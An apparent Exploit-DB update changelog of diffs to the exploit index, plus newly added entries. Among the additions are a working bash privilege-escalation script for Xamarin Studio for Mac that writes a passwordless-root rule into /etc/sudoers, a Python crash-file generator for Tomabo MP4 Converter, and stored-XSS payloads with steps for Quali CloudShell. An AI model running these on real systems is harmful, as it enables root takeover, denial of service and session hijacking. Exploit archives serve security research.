DB: 2017-08-15

3 new exploits

GetRight 5.2a - Skin File (.grs) Buffer Overflow
GetRight 5.2a - '.grs' Skin File Buffer Overflow

Tomabo MP4 Converter 3.19.15 - Denial of Service

Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation

Winamp 5.04 - Skin File (.wsz) Remote Code Execution
Winamp 5.04 - '.wsz' Skin File Remote Code Execution

PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit (Compiled)
PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit

Concrete5 < 5.4.2.1 - Multiple Vulnerabilities
Concrete5 CMS < 5.4.2.1 - Multiple Vulnerabilities

Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection
Concrete5 CMS 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection

Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting
Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting

Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion
Concrete5 CMS 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion

Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting

Concrete5 8.1.0 - 'Host' Header Injection
Concrete5 CMS 8.1.0 - 'Host' Header Injection

DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request
DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery

Red-Gate SQL Monitor < 3.10/4.2 - Authentication Bypass
Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass

files.csv

@@ -104,7 +104,7 @@ id,file,description,date,author,platform,type,port
 667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0
 671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0
 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0
-677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
+677,platforms/windows/dos/677.txt,"GetRight 5.2a - '.grs' Skin File Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
 679,platforms/windows/dos/679.c,"Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0
 682,platforms/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0
 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0
@@ -5639,6 +5639,7 @@ id,file,description,date,author,platform,type,port
 42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0
 42433,platforms/linux/dos/42433.txt,"WildMIDI 0.4.2 - Multiple Vulnerabilities",2017-08-08,qflb.wu,linux,dos,0
 42445,platforms/win_x86-64/dos/42445.html,"Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure",2017-08-10,"Google Security Research",win_x86-64,dos,0
+42451,platforms/windows/dos/42451.py,"Tomabo MP4 Converter 3.19.15 - Denial of Service",2017-08-13,"Andy Bowden",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9178,6 +9179,7 @@ id,file,description,date,author,platform,type,port
 42429,platforms/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0
 42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 -  GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0
 42435,platforms/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local,0
+42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -9360,7 +9362,7 @@ id,file,description,date,author,platform,type,port
 409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0
-418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
+418,platforms/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
 421,platforms/windows/remote/421.c,"Gaucho 1.4 - Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote,0
 424,platforms/linux/remote/424.c,"Citadel/UX - Remote Buffer Overflow",2004-08-30,Nebunu,linux,remote,504
 425,platforms/hardware/remote/425.c,"D-Link DCS-900 Camera - Remote IP Address Changer Exploit",2004-08-31,anonymous,hardware,remote,0
@@ -16413,7 +16415,7 @@ id,file,description,date,author,platform,type,port
 659,platforms/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0
 673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
 676,platforms/php/webapps/676.c,"phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Exploit",2004-12-05,evilrabbi,php,webapps,0
-697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit (Compiled)",2004-12-17,overdose,php,webapps,0
+697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Exploit",2004-12-17,overdose,php,webapps,0
 702,platforms/php/webapps/702.pl,"phpBB - highlight Arbitrary File Upload (Santy.A)",2004-12-22,anonymous,php,webapps,0
 703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions Exploit",2004-12-22,sysbug,php,webapps,0
 704,platforms/php/webapps/704.pl,"e107 - 'include()' Remote Exploit",2004-12-22,sysbug,php,webapps,80
@@ -25575,7 +25577,7 @@ id,file,description,date,author,platform,type,port
 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore - Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0
 17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite - reGenerateReports Stored procedure SQL Injection (Metasploit)",2011-10-02,Metasploit,cgi,webapps,0
 17924,platforms/jsp/webapps/17924.pl,"JBoss & JMX Console - Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps,0
-17925,platforms/php/webapps/17925.txt,"Concrete5 < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0
+17925,platforms/php/webapps/17925.txt,"Concrete5 CMS < 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0
 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel - Admin Authentication Bypass",2011-10-04,Jasman,php,webapps,0
 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 - File Disclosure",2011-10-04,bd0rk,php,webapps,0
 18033,platforms/php/webapps/18033.txt,"Joomla! Component 'com_yjcontactus' - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
@@ -32512,7 +32514,7 @@ id,file,description,date,author,platform,type,port
 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496
 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0
 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80
-31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80
+31735,platforms/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80
 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0
 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injections",2008-05-05,ZoRLu,php,webapps,0
 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
@@ -35757,7 +35759,7 @@ id,file,description,date,author,platform,type,port
 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0
 37101,platforms/php/webapps/37101.txt,"Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0
 37102,platforms/php/webapps/37102.txt,"Joomla! Component 'com_videogallery' - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0
-37103,platforms/php/webapps/37103.txt,"Concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
+37103,platforms/php/webapps/37103.txt,"Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0
 37106,platforms/php/webapps/37106.txt,"WordPress Plugin Video Gallery 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80
@@ -37246,7 +37248,7 @@ id,file,description,date,author,platform,type,port
 40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445
 40042,platforms/php/webapps/40042.php,"WordPress Plugin Ultimate Membership Pro 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80
 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)",2016-06-29,KoreLogic,cgi,webapps,443
-40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
+40045,platforms/php/webapps/40045.txt,"Concrete5 CMS 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
 40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
 40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
 40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution / Cross-Site Request Forgery",2016-07-04,LiquidWorm,jsp,webapps,30303
@@ -37997,6 +37999,7 @@ id,file,description,date,author,platform,type,port
 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
+42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@@ -38067,7 +38070,7 @@ id,file,description,date,author,platform,type,port
 41881,platforms/multiple/webapps/41881.html,"agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery",2017-04-13,"SySS GmbH",multiple,webapps,0
 41882,platforms/multiple/webapps/41882.html,"agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting",2017-04-13,"SySS GmbH",multiple,webapps,0
 41884,platforms/php/webapps/41884.rb,"Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)",2017-04-13,"Peter Lapp",php,webapps,0
-41885,platforms/php/webapps/41885.txt,"Concrete5 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0
+41885,platforms/php/webapps/41885.txt,"Concrete5 CMS 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0
 41890,platforms/php/webapps/41890.txt,"Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset",2017-04-16,hyp3rlinx,php,webapps,0
 41900,platforms/multiple/webapps/41900.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41918,platforms/php/webapps/41918.txt,"FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-25,"Cyril Vallicari",php,webapps,0
@@ -38239,14 +38242,14 @@ id,file,description,date,author,platform,type,port
 42431,platforms/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80
 42434,platforms/hardware/webapps/42434.py,"Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution",2017-08-08,"Kacper Szurek",hardware,webapps,0
 42436,platforms/jsp/webapps/42436.py,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration",2017-08-09,LiquidWorm,jsp,webapps,0
-42437,platforms/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request",2017-08-09,LiquidWorm,jsp,webapps,0
+42437,platforms/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-08-09,LiquidWorm,jsp,webapps,0
 42438,platforms/jsp/webapps/42438.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal",2017-08-09,LiquidWorm,jsp,webapps,0
 42439,platforms/jsp/webapps/42439.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery",2017-08-09,LiquidWorm,jsp,webapps,0
 42440,platforms/php/webapps/42440.txt,"WebFile Explorer 1.0 - Arbitrary File Download",2017-08-09,"Ihsan Sencan",php,webapps,0
 42441,platforms/php/webapps/42441.txt,"ImageBay 1.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps,0
 42442,platforms/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps,0
 42443,platforms/php/webapps/42443.txt,"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting",2017-08-10,"Touhid M.Shaikh",php,webapps,0
-42444,platforms/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10/4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",windows,webapps,0
+42444,platforms/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",windows,webapps,0
 42446,platforms/php/webapps/42446.txt,"DeWorkshop 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0

platforms/linux/remote/3021.txt

@@ -2,6 +2,6 @@
 # solareclipse at phreedom dot org
 # GPG key ID: E36B11B7
 
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz    (12262006-proftpd-not-pro-enough.tar.gz)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz)
 
 # milw0rm.com [2003-10-15]

platforms/linux/remote/609.txt

@@ -1,4 +1,4 @@
 Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz   (ximage_zgv.tar.gz)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/609.tar.gz (ximage_zgv.tar.gz)
 
 # milw0rm.com [2004-10-28]

platforms/macos/local/42454.txt

@@ -0,0 +1,38 @@
+Source: https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html
+
+Abstract
+
+Xamarin Studio is an Integrated Development Environment (IDE) used to create iOS, Mac and Android applications. Xamarin Studio supports developments in C# and F# (by default). The API documentation update mechanism of Xamarin Studio for Mac is installed as setuid root. This update mechanism contains several flaws that could be leveraged by a local attacker to gain elevated (root) privileges.
+
+Tested versions
+
+This issue was successfully verified on Xamarin Studio for Mac version 6.2.1 (build 3) and version 6.3 (build 863).
+
+Fix
+
+Microsoft released a new version of Xamarin.iOS that addresses this issue:
+- Security update for the elevation of privilege vulnerability for Xamarin.iOS: August 14, 2017 (4037359)
+
+#!/bin/bash
+# WARNING: this scripts overwrites ~/.curlrc and /private/etc/sudoers (when successful)
+#target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.6.0.10/share/doc/MonoTouch/apple-doc-wizard
+target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.8.0.175/share/doc/MonoTouch/apple-doc-wizard
+rm -rf ~/Library/Developer/Shared/Documentation/DocSets
+   
+cat << __EOF > /private/tmp/sudoers
+%everyone   ALL=(ALL) NOPASSWD: ALL
+__EOF
+   
+cat << __EOF > ~/.curlrc
+url=file:///private/tmp/sudoers
+output=/private/etc/sudoers
+__EOF
+   
+echo 
+echo "*** press CRL+C when the download starts ***"
+$target
+echo
+   
+sudo -- sh -c 'rm -rf /private/tmp/ios-docs-download.*; su -'
+   
+rm -f /private/tmp/sudoers ~/.curlrc

platforms/multiple/dos/1820.txt

@@ -1,5 +1,5 @@
 # netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit
 
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip  (05232006-panza.zip)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1820.zip (05232006-panza.zip)
 
 # milw0rm.com [2006-05-23]

platforms/multiple/dos/2587.txt

@@ -3,6 +3,6 @@ Damian Put pucik[at]gazeta.pl
 	   pucik[@]overflow.pl
 	   http://overflow.pl
 
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2  (10172006-clam_petite_heap.exe.bz2
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2
 
 # milw0rm.com [2006-10-17]

platforms/multiple/dos/2911.txt

@@ -1,5 +1,5 @@
 Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability
 
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm  (12092006-sophos_namelen.chm)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2911.chm (12092006-sophos_namelen.chm)
 
 # milw0rm.com [2006-12-10]

platforms/multiple/remote/1791.patch

@@ -15,6 +15,6 @@ xx  vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
        os->flush();
        vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType);     }
 
-Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar   (05162006-BL4CK-vncviewer-authbypass.rar)
+Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)
 
 

platforms/multiple/remote/1799.txt

@@ -1,8 +1,8 @@
 class101 - http://heapoverflow.com
 RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners
 ---------------------------------------------------------------------
-windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar  (05172006-VNC_bypauth-win32.rar)
+windows: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar)
-linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar  (05172006-VNC_bypauth-linux.tar.gz)
+linux: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz)
 comments: http://heapoverflow.com/viewtopic.php?p=1729
 ---------------------------------------------------------------------
 

platforms/multiple/remote/349.txt

@@ -1,3 +1,3 @@
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/349.tgz    (x2.tgz)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/349.tgz (x2.tgz)
 
 # milw0rm.com [2002-05-01]

platforms/php/webapps/697.c

@@ -1,4 +1,4 @@
-// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/697.rar   (phpbbmemorydump.rar)
+// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/697.rar (phpbbmemorydump.rar)
 // Source serv.cpp is at the bottom of the page - str0ke
 
 // Notes from author:

platforms/windows/dos/1615.txt

@@ -1,4 +1,4 @@
-# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1615.rar  (excel_03262006.rar)
+# Full archive at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1615.rar (excel_03262006.rar)
 
 Topic      : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0
 Date       : 02/12/2006

platforms/windows/dos/1783.txt

@@ -1,5 +1,5 @@
 # Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit
 
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1783.zip  (05132006-genecysbof.zip)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1783.zip (05132006-genecysbof.zip)
 
 # milw0rm.com [2006-05-14]

platforms/windows/dos/1784.txt

@@ -1,5 +1,5 @@
 # Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit
 
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1784.zip   (05132006-raydiumx.zip)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1784.zip (05132006-raydiumx.zip)
 
 

platforms/windows/dos/3690.txt

@@ -26,7 +26,7 @@ file613-1.doc -  Word 2007 CPU exhaustion DOS + ding - CPU shoots up to 100 %, a
 
 These files can be found at http://www.offensive-security.com/0day/0day.tar.gz
 
-backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3690.tar.gz  (04092007-0day.tar.gz)
+backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3690.tar.gz (04092007-0day.tar.gz)
  
 
 Be safe,

platforms/windows/dos/4121.txt

@@ -4,6 +4,6 @@ http://www.ph4nt0m.org
  
 Tested on: Full Patched Excel 2003 Sp2, CN
 
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4121.zip  (06272007-2670.zip)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4121.zip (06272007-2670.zip)
 
 # milw0rm.com [2007-06-27]

platforms/windows/dos/42451.py

@@ -0,0 +1,20 @@
+#!/usr/bin/python
+
+# Exploit Title: Tomabo MP4 Converter DOS
+# Date: 13/08/17
+# Exploit Author: Andy Bowden
+# Vendor Homepage: http://www.tomabo.com/
+# Software Link: http://www.tomabo.com/mp4-converter/index.html
+# Version: 3.19.15
+# Tested on: Windows 7 x86
+# CVE : None
+
+#Generate a .m3u file using the python script and import it into the MP4 Converter.
+
+file = "crash.m3u"
+
+buffer = "A" * 550000
+
+f = open(file, "w")
+f.write(buffer)
+f.close()

platforms/windows/dos/677.txt

@@ -20,7 +20,7 @@ Solutions:
 There was no response.
 
 Exploit:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/677.grs   (c_skin.grs)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/677.grs (c_skin.grs)
 When you copy or click this link, getright automaticly download and try to load
 crafted skin and will trigger buffer overflow
 

platforms/windows/dos/770.txt

@@ -15,7 +15,7 @@ will can cause the remote system to crash.
 
 --Uncompleted qtif image file header
 http://www.atmacasoft.com/exp/vuln.qtif.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/770.qtif  (vuln.qtif)
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/770.qtif (vuln.qtif)
 
 00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............
 0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM

platforms/windows/local/11199.txt

@@ -1,5 +1,5 @@
 Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip)
-EDB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder.
+E-DB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder.
 
 
 

platforms/windows/webapps/42453.txt

@@ -0,0 +1,96 @@
+# Vulnerability type: Multiple Stored Cross Site Scripting
+# Vendor: Quali
+# Product: CloudShell
+# Affected version: v7.1.0.6508 (Patch 6)
+# Patched version: v8 and up
+# Credit: Benjamin Lee 
+# CVE ID: CVE-2017-9767
+
+==========================================================
+
+# Overview
+Quali CloudShell (v7.1.0.6508 Patch 6) is vulnerable to multiple stored XSS vulnerabilities on its platform this can be exploited to execute arbitrary HTML and script code on all users (including administrators) from a low-privileged account.
+
+==========================================================
+
+# Vulnerable URL 1 (Reservation Function)
+/RM/Reservation/ReserveNew
+
+# Vulnerable parameter(s)
+- Name
+- Description
+
+# Sample payload
+'"><script>alert("xss")</script>
+
+# PROOF OF CONCEPT 
+- Go to the "Inventory" tab
+- Click on details button on either of the items
+- Click on the reserve button and enter the XSS payload onto the affected parameters
+- Add users to the permitted user list (e.g. admin accounts)
+- Once the user click on the reservation list details, the XSS would be executed
+
+==========================================================
+
+# Vulnerable URL 2 (Environment Function)
+/RM/Topology/Update
+
+# Vulnerable parameter(s)
+- Description
+
+# Sample payload
+'"><script>alert("xss")</script>
+
+# PROOF OF CONCEPT 
+- Go to the "Environment" tab
+- Click on item properties button
+- Enter the XSS payload onto the affected parameters
+- Change the owner to another user (e.g. admin accounts)
+- Once the user click on the more info button of the item in the environment tab, the XSS would be executed
+
+==========================================================
+
+# Vulnerable URL 3 (Job Scheduling Function)
+/SnQ/JobTemplate/Edit?jobTemplateId=<job template id>
+
+# Vulnerable parameter(s)
+- Name
+- Description
+- ExecutionBatches[0].Name
+- ExecutionBatches[0].Description
+- Labels
+
+# Sample payload
+'"><script>alert("xss")</script>
+
+# PROOF OF CONCEPT 
+- Go to the "Job Scheduling > Add New Suite" tab
+- Enter the XSS payload onto the affected parameters
+- Once the user view details of this suite, the XSS would be executed
+
+==========================================================
+
+# Vulnerable URL 4 (Resource Template Function)
+/RM/AbstractTemplate/AddOrUpdateAbstractTemplate
+
+# Vulnerable parameter(s)
+- Alias
+- Description
+
+# Sample payload
+'"><script>alert("xss")</script>
+
+# PROOF OF CONCEPT 
+- Go to the "Inventory > abstract template > Add New" tab
+- Enter the XSS payload onto the affected parameters
